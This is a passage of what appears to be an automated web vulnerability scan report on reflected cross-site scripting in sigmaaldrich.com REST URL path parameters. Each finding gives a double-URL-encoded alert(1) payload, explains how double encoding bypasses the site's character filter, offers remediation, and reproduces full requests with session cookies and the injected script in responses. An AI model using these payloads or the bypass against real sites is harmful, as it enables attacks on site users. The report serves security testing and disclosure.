bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:53 GMT
Content-Length: 28948
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/8d7dd";alert(1)//bcdc9532a6e/en-us/home/large-molecule-biologics","E404") ;
   </script>
...[SNIP]...

1.75. http://www.sigmaaldrich.com/content/safc-pharma/en-us/home/small-molecule-api/services-overview [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/safc-pharma/en-us/home/small-molecule-api/services-overview

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 68a09%2522%253balert%25281%2529%252f%252f19b43806d4c was submitted in the REST URL parameter 1. This input was echoed as 68a09";alert(1)//19b43806d4c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content68a09%2522%253balert%25281%2529%252f%252f19b43806d4c/safc-pharma/en-us/home/small-molecule-api/services-overview HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:54 GMT
Content-Length: 28971
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content68a09";alert(1)//19b43806d4c/safc-pharma/en-us/home/small-molecule-api/services-overview","E404") ;
   </script>
...[SNIP]...

1.76. http://www.sigmaaldrich.com/content/safc-pharma/en-us/home/small-molecule-api/services-overview [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/safc-pharma/en-us/home/small-molecule-api/services-overview

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f6c9a%2522%253balert%25281%2529%252f%252fb2927071e03 was submitted in the REST URL parameter 2. This input was echoed as f6c9a";alert(1)//b2927071e03 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/f6c9a%2522%253balert%25281%2529%252f%252fb2927071e03/en-us/home/small-molecule-api/services-overview HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:58 GMT
Content-Length: 28960
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/f6c9a";alert(1)//b2927071e03/en-us/home/small-molecule-api/services-overview","E404") ;
   </script>
...[SNIP]...

1.77. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/analytical-chromatography/analytical-chromatography-catalog [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/analytical-chromatography/analytical-chromatography-catalog

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0a76%2522%253balert%25281%2529%252f%252f6370404ea8b was submitted in the REST URL parameter 1. This input was echoed as a0a76";alert(1)//6370404ea8b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /contenta0a76%2522%253balert%25281%2529%252f%252f6370404ea8b/sigma-aldrich/areas-of-interest/analytical-chromatography/analytical-chromatography-catalog HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:45 GMT
Content-Length: 29003
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/contenta0a76";alert(1)//6370404ea8b/sigma-aldrich/areas-of-interest/analytical-chromatography/analytical-chromatography-catalog","E404") ;
   </script>
...[SNIP]...

1.78. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/analytical-chromatography/analytical-chromatography-catalog [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/analytical-chromatography/analytical-chromatography-catalog

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c772%2522%253balert%25281%2529%252f%252f055e4b14ac2 was submitted in the REST URL parameter 2. This input was echoed as 1c772";alert(1)//055e4b14ac2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich1c772%2522%253balert%25281%2529%252f%252f055e4b14ac2/areas-of-interest/analytical-chromatography/analytical-chromatography-catalog HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:47 GMT
Content-Length: 29003
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich1c772";alert(1)//055e4b14ac2/areas-of-interest/analytical-chromatography/analytical-chromatography-catalog","E404") ;
   </script>
...[SNIP]...

1.79. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/analytical-chromatography/analytical-chromatography-catalog [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/analytical-chromatography/analytical-chromatography-catalog

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42f4a%2522%253balert%25281%2529%252f%252fcc9d2f2abe8 was submitted in the REST URL parameter 3. This input was echoed as 42f4a";alert(1)//cc9d2f2abe8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest42f4a%2522%253balert%25281%2529%252f%252fcc9d2f2abe8/analytical-chromatography/analytical-chromatography-catalog HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
